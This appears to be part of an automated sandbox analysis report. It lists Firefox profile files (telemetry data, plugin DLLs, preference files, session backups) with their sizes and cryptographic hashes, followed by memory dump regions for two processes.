C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
a0d0acae6fc41098e04caf004169e5da

SHA1
8d734ad9a33aea0c1dd1efdef5214ec143583f2c

SHA256
c77646e237d5e87a3f9d657587ee861aa96d065e6de5e168eaca12796f9e7d2d

SHA512
47c32ca6705cad247871980c227950ba3f2ceec88c08a16d363c56cf32e343b33c864fa8e87c0dddb06831f9ce9b47b847e3ef05990e95be830198d318eaac29

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
e35a5f09d2d8166c3c1449f198963a42

SHA1
7bd15e25fbfad973f2a5f6e0a2d33a654320319d

SHA256
c1f3ee3e2b86800357129e2e4af6ca1b27cbbc267ca2c0cb6c07493f850449ea

SHA512
4363fada8698572e89df7e6019232658986279a5ead59463f87a1a4db719372bd186ff4d67d3454d93adff91fdbdad454312d182cdf6995b8c6beec6e303f0de

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\4a8b4784-d1ca-4d17-9d00-ac5072c1c529

Filesize
671B

MD5
280207edffb7e4ff332539c0aedbccd0

SHA1
9b5577b86468a991e6c75133b961e01b86734b91

SHA256
1ed4263777eb41c42e3d01afeca7161d1bfb5211b0d4664ff972e6ea94a46192

SHA512
35f0f7c7a1271868236cf06661b216009ac2c640226963341a6a10c7e5d1a2b3cdb3959c71ca209680479576d8618522355032ea8196c1005629a63d79a257af

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\50fe61b2-d13b-4cee-be78-5216314b3537

Filesize
982B

MD5
2ce5dec1fe453b1380a7e0d63af37c1a

SHA1
acf8aaa1f04a20c39ad6a07049be5318499e94f5

SHA256
2b86b3a6dc836a40d3c351f5963a58a46aa145b4418c301a2504f7774541b79f

SHA512
56f3d8593f1d5f944a3c5bead6859c289ce0e41365afa64fcd0b993cc59d1cce18e99fedafa1fa58c327fee4e5ea1ad467f8b823b7a5d4eea5ddd47931cf0a96

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\datareporting\glean\pending_pings\54074bfc-0bd6-4724-aa10-28d234edd7ce

Filesize
28KB

MD5
529b607198e1a8d3241c0f9855433275

SHA1
fe78214c78917ab5c20c10610239bb9160974e16

SHA256
7a1200dcc5c5346dd8c58c2076d185157be6e8a8e035afae0d944a89d18e0767

SHA512
31f95ca8c68b293d1145c417abef558c3b8552ef6354a258770bdbaafacaa790bc0a963d48e7fd238caed915b176d5d00eed420e8747719b767bc1d211d1f027

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

Filesize
10KB

MD5
b8fd32bee2debd40bf0310b31a4b4fdb

SHA1
b3bcb34ac35308abf8afaba8551d0533d8b72cfa

SHA256
d6d501b7adac9d6ded77ecb58605facacdd67a1ab9c9a1d2d286b3ea8d96d481

SHA512
9678ca58ea2bbb5209477afa31b2fbf62195c0878a7553e7439318323f4b2532dffd32367e05bf894a5333d053fa063241469747d6b8d59ff0dd2889a8103a6b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

Filesize
11KB

MD5
0d5547ceb44ef5a84c7d1b999efac567

SHA1
0a6e3a77826a583d79705812dd3adea42b263e2e

SHA256
1608b3a5a52b41715c3e5c12df5c9b8bd0f02fb1aeaac257345221652f37b1b4

SHA512
6aebf7cc677066b87fd1059441144e0146d6ba8225d1898978b3f7d93f52578f483915542c4f8a23e3fa5719358ba265384f7f3d79101a02f1c6afc8e9cf113e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs-1.js

Filesize
11KB

MD5
9cd4f1e6fed73bbce5f832c5df8a01a7

SHA1
f805d22af642201a5b5609385dd68fd33145d8f1

SHA256
3156794a94d4cdd5f640aa4d76068725624c6c46379212731681915dc2f16910

SHA512
5d29cf1baf84477c47d9019660b5eeb36967bb2297697a6375b61f3a04d06e3905315d86e347828facddca648ea89ab3157de94da26e81e061b58fd6c675202d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\prefs.js

Filesize
11KB

MD5
7942b7eb9b0f44839b32ee0e2e128fff

SHA1
f5bc2f5e8969ece3f2381e18e3e2c31fcf2e0fdb

SHA256
2e46189d385f137769ceb8ff6bdfa3e1e115f3ca23470cc8c8b6ffd9274d5c95

SHA512
56a0d5359c7e00024fc4ed1c71b26c97a491f7f8c1fced4ecf66afb5e086a2829d770dd8d72898cbf06d0db5c29230a23c55ca79c88a7f6e75b64746b8ebc51e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\sessionstore-backups\recovery.baklz4

Filesize
3KB

MD5
e6587aca38c1c9df2114b1c270fdfc4f

SHA1
3920d28a630ba79c92de6ef4b3aa6fd2c5426f2d

SHA256
8aa59816694d7dc7aae19abc2e8e583bd2623a2669ece85490af898ed13422e6

SHA512
8940f2df3a8149e9b418565b9e5cf4423c34445bd2d47206e2d83263a2cb5cebdd38dc60b91829fe782f105c80190be93a47edad5457cc40a55fec9487439d17

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6ir3v68x.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
384KB

MD5
a5da7c0cbf97863e683f1483166afc61

SHA1
eafabfedc2070bc4c44974b97a0bc6ea77160733

SHA256
96243f489ad349f7a127dedba82f9fd8d08e3c83a5749587cca61a90098c423e

SHA512
a01c25e252f2207274e1b4370e7ed9c0d6b567894befdc65237287448a2469447c8abb3ca25d0bb2ec6d39f0ef79fcfab70cce7341ee6433de49b0461390b139

Download Submit
memory/2236-13-0x000001ED3F3C0000-0x000001ED3F3E2000-memory.dmp

Filesize
136KB

Download
memory/2236-14-0x00007FFE440C0000-0x00007FFE44B81000-memory.dmp

Filesize
10.8MB

Download
memory/2236-15-0x00007FFE440C0000-0x00007FFE44B81000-memory.dmp

Filesize
10.8MB

Download
memory/2236-18-0x00007FFE440C0000-0x00007FFE44B81000-memory.dmp

Filesize
10.8MB

Download
memory/2236-3-0x00007FFE440C0000-0x00007FFE44B81000-memory.dmp

Filesize
10.8MB

Download
memory/4532-35-0x0000026C9F410000-0x0000026C9F42E000-memory.dmp

Filesize
120KB

Download
memory/4532-2-0x00007FFE440C0000-0x00007FFE44B81000-memory.dmp

Filesize
10.8MB

Download
memory/4532-72-0x0000026C9F430000-0x0000026C9F43A000-memory.dmp

Filesize
40KB

Download
memory/4532-34-0x0000026CB94B0000-0x0000026CB9500000-memory.dmp

Filesize
320KB

Download
memory/4532-90-0x00007FFE440C0000-0x00007FFE44B81000-memory.dmp

Filesize
10.8MB

Download
memory/4532-88-0x00007FFE440C3000-0x00007FFE440C5000-memory.dmp

Filesize
8KB

Download
memory/4532-95-0x00007FFE440C0000-0x00007FFE44B81000-memory.dmp

Filesize
10.8MB

Download
memory/4532-0-0x00007FFE440C3000-0x00007FFE440C5000-memory.dmp

Filesize
8KB

Download
memory/4532-33-0x0000026CB9530000-0x0000026CB95A6000-memory.dmp

Filesize
472KB

Download
memory/4532-1-0x0000026C9ED70000-0x0000026C9EDB6000-memory.dmp

Filesize
280KB

Download
memory/4532-73-0x0000026CB9500000-0x0000026CB9512000-memory.dmp

Filesize
72KB

Download